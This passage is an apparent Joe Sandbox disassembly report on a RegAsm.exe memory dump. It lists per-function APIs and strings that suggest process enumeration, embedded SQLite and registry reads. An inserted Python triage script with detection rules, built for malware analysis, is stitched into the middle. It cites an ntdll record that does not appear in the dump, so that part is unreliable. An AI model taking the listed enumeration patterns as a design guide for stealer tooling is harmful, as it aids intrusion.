                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$wcslen
                          • String ID:
                          • API String ID: 3592753638-3916222277
                          • Opcode ID: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                          • Opcode Fuzzy Hash: 6ece4f15149c4f8b0f1e95fdfa43d3662bfdaf9dea83468c5f0cbecd63c28e51
                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                          APIs
                          • memset.MSVCRT ref: 0040A47B
                          • _snwprintf.MSVCRT ref: 0040A4AE
                          • wcslen.MSVCRT ref: 0040A4BA
                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                          • wcslen.MSVCRT ref: 0040A4E0
                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$_snwprintfmemset
                          • String ID: %s (%s)$YV@
                          • API String ID: 3979103747-598926743
                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                          APIs
                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                          • wcslen.MSVCRT ref: 0040A6B1
                          • wcscpy.MSVCRT ref: 0040A6C1
                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                          • wcscpy.MSVCRT ref: 0040A6DB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                          • String ID: Unknown Error$netmsg.dll
                          • API String ID: 2767993716-572158859
                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                          APIs
                          Strings
                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                          • unable to open database: %s, xrefs: 0042F84E
                          • out of memory, xrefs: 0042F865
                          • cannot ATTACH database within transaction, xrefs: 0042F663
                          • database %s is already in use, xrefs: 0042F6C5
                          • database is already attached, xrefs: 0042F721
                          • too many attached databases - max %d, xrefs: 0042F64D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                          • API String ID: 1297977491-2001300268
                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                          APIs
                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                          • Sleep.KERNEL32(00000001), ref: 004178E9
                          • GetLastError.KERNEL32 ref: 004178FB
                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: File$ErrorLastLockSleepUnlock
                          • String ID:
                          • API String ID: 3015003838-0
                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                          • wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                          • wcslen.MSVCRT ref: 0040D1D3
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                          • String ID: strings
                          • API String ID: 3166385802-3030018805
                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                          APIs
                          • memset.MSVCRT ref: 0040D8BD
                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                          • memset.MSVCRT ref: 0040D906
                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                          • _wcsicmp.MSVCRT ref: 0040D92F
                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                          • String ID: sysdatetimepick32
                          • API String ID: 1028950076-4169760276
                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                          APIs
                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$FreeLoadMessage
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 3897320386-317687271
                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                          • API String ID: 4271163124-70141382
                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                          • API String ID: 4139908857-3953557276
                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                          APIs
                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                          • memset.MSVCRT ref: 0041BA3D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: -journal$-wal
                          • API String ID: 438689982-2894717839
                          • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                          • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00418836
                          • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                          • GetCurrentProcessId.KERNEL32 ref: 00418856
                          • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                          • GetTickCount.KERNEL32 ref: 0041887D
                          • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                          • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                          • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                          • String ID:
                          • API String ID: 4218492932-0
                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
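The function records above list, per function, the imported APIs and the string constants the IDA plugin found next to them. The interesting signal is in the combinations: a function that resolves NtSuspendProcess/NtResumeProcess/NtLoadDriver out of ntdll.dll, another that resolves the Toolhelp32 process/module walk out of kernel32.dll, SQLite-style "-journal"/"-wal" and ATTACH error strings, and a 32-byte seed built from GetSystemTime, the PID, GetTickCount and QueryPerformanceCounter. The Python below is an added triage aid, not part of the Joe Sandbox report or of the sample; it turns a handful of those records (copied from the entries above as constructed input) into capability tags. The rule names, the capability labels and the "dynamic API resolution" heuristic (a resolver API plus a *.dll string plus at least two CamelCase export-like names) are the editor's assumptions, not something the report states.

```python
"""Capability triage over per-function API / string lists from a sandbox function dump."""
import re
from collections import Counter

# Constructed input: API names and String IDs copied from a few of the function
# records above (RegAsm.exe memory dump, Joe Sandbox IDA plugin output), keyed by
# the first listed call site.  Real reports would be parsed, not hand-copied.
SAMPLE_RECORDS = {
    "00413542": {"apis": ["GetModuleHandleW"],
                 "strings": ["NtLoadDriver", "NtOpenSymbolicLinkObject", "NtQueryObject",
                             "NtQuerySymbolicLinkObject", "NtQuerySystemInformation",
                             "NtResumeProcess", "NtSuspendProcess", "NtUnloadDriver",
                             "ntdll.dll"]},
    "0042F64D": {"apis": ["memcpy", "memset"],
                 "strings": ["cannot ATTACH database within transaction",
                             "too many attached databases - max %d",
                             "unable to open database: %s"]},
    "004178DF": {"apis": ["LockFile", "Sleep", "GetLastError", "UnlockFile"], "strings": []},
    "0041384C": {"apis": ["GetModuleHandleW"],
                 "strings": ["CreateToolhelp32Snapshot", "Module32First", "Module32Next",
                             "Process32First", "Process32Next", "kernel32.dll"]},
    "0041B911": {"apis": ["memcpy", "memset"], "strings": ["-journal", "-wal"]},
    "00418836": {"apis": ["GetSystemTime", "memcpy", "GetCurrentProcessId",
                          "GetTickCount", "QueryPerformanceCounter"], "strings": []},
    "004044C3": {"apis": ["LoadLibraryW", "FreeLibrary", "MessageBoxW"],
                 "strings": ["Error", "Error: Cannot load the common control classes.",
                             "InitCommonControlsEx", "comctl32.dll"]},
}

# Hypothetical rule set (editor's assumption): a rule fires when every token in the
# set appears among a record's APIs or strings.  Labels are analyst shorthand.
RULES = {
    "process-suspend-resume-via-ntdll": {"NtSuspendProcess", "NtResumeProcess", "ntdll.dll"},
    "driver-load-unload-via-ntdll": {"NtLoadDriver", "NtUnloadDriver"},
    "process-module-enumeration-toolhelp32": {"CreateToolhelp32Snapshot",
                                              "Process32First", "Process32Next"},
    "embedded-sqlite-attach": {"cannot ATTACH database within transaction"},
    "embedded-sqlite-pager-journal-wal": {"-journal", "-wal"},
    "file-lock-retry-loop": {"LockFile", "UnlockFile", "Sleep"},
    "entropy-seed-from-time-pid-tick-qpc": {"GetSystemTime", "GetCurrentProcessId",
                                            "GetTickCount", "QueryPerformanceCounter"},
}

# Export-like names: start uppercase and contain at least one more uppercase letter,
# so "NtSuspendProcess" and "Process32First" count but "Error" does not.
_CAMEL = re.compile(r"^[A-Z][a-z0-9]*(?:[A-Z][A-Za-z0-9]*)+$")
RESOLVER_APIS = {"GetModuleHandleW", "GetModuleHandleA", "GetProcAddress",
                 "LoadLibraryW", "LoadLibraryA", "LoadLibraryExW"}


def record_tokens(rec):
    """All matchable tokens of one record: API names plus string constants."""
    return set(rec["apis"]) | set(rec["strings"])


def match_rules(rec, rules=RULES):
    """Names of every rule whose token set is fully present in the record."""
    toks = record_tokens(rec)
    return sorted(name for name, needed in rules.items() if needed <= toks)


def resolves_apis_dynamically(rec, min_names=2):
    """Heuristic: resolver API + a *.dll string + >= min_names export-like strings."""
    if not RESOLVER_APIS & set(rec["apis"]):
        return False
    if not any(s.lower().endswith(".dll") for s in rec["strings"]):
        return False
    return sum(1 for s in rec["strings"] if _CAMEL.match(s)) >= min_names


def triage(records, rules=RULES):
    """Map each function address to the list of capability tags it earns."""
    out = {}
    for addr, rec in records.items():
        hits = match_rules(rec, rules)
        if resolves_apis_dynamically(rec):
            hits.append("dynamic-api-resolution")
        out[addr] = hits
    return out


def capability_summary(records, rules=RULES):
    """Count how many functions carry each tag, for a quick sample-level overview."""
    counts = Counter()
    for hits in triage(records, rules).values():
        counts.update(hits)
    return dict(counts)


if __name__ == "__main__":
    for addr, tags in triage(SAMPLE_RECORDS).items():
        print(addr, tags)
    print(capability_summary(SAMPLE_RECORDS))
```

The comctl32.dll record deliberately earns no tag: it loads a library and names one export, which is ordinary GUI setup, and the two-name threshold keeps it out of the dynamic-resolution bucket. Tune the rule table to the families you track; the point is that pairing an import with the strings sitting beside it separates API-resolver stubs and embedded-library code from the rest of a large dump faster than reading each record.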
                          APIs
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                            • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                          • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                            • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                          • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$memset
                          • String ID: gj
                          • API String ID: 438689982-4203073231
                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ItemMenu$CountInfomemsetwcschr
                          • String ID: 0$6
                          • API String ID: 2029023288-3849865405
                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                          APIs
                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                          • memset.MSVCRT ref: 00405455
                          • memset.MSVCRT ref: 0040546C
                          • memset.MSVCRT ref: 00405483
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$memcpy$ErrorLast
                          • String ID: 6$\
                          • API String ID: 404372293-1284684873
                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLastSleep$free
                          • String ID:
                          • API String ID: 1470729244-0
                          • Opcode ID: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                          • Opcode Fuzzy Hash: 609e8585d10487ae529d0e45f017ab7cc050c6f090476510ecc0468bc0539608
                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                          • wcscpy.MSVCRT ref: 0040A0D9
                          • wcscat.MSVCRT ref: 0040A0E6
                          • wcscat.MSVCRT ref: 0040A0F5
                          • wcscpy.MSVCRT ref: 0040A107
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                          • String ID:
                          • API String ID: 1331804452-0
                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                          APIs
                          Strings
                          • <?xml version="1.0" ?>, xrefs: 0041007C
                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                          • <%s>, xrefs: 004100A6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_snwprintf
                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                          • API String ID: 3473751417-2880344631
                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscat$_snwprintfmemset
                          • String ID: %2.2X
                          • API String ID: 2521778956-791839006
                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintfwcscpy
                          • String ID: dialog_%d$general$menu_%d$strings
                          • API String ID: 999028693-502967061
                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                          APIs
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
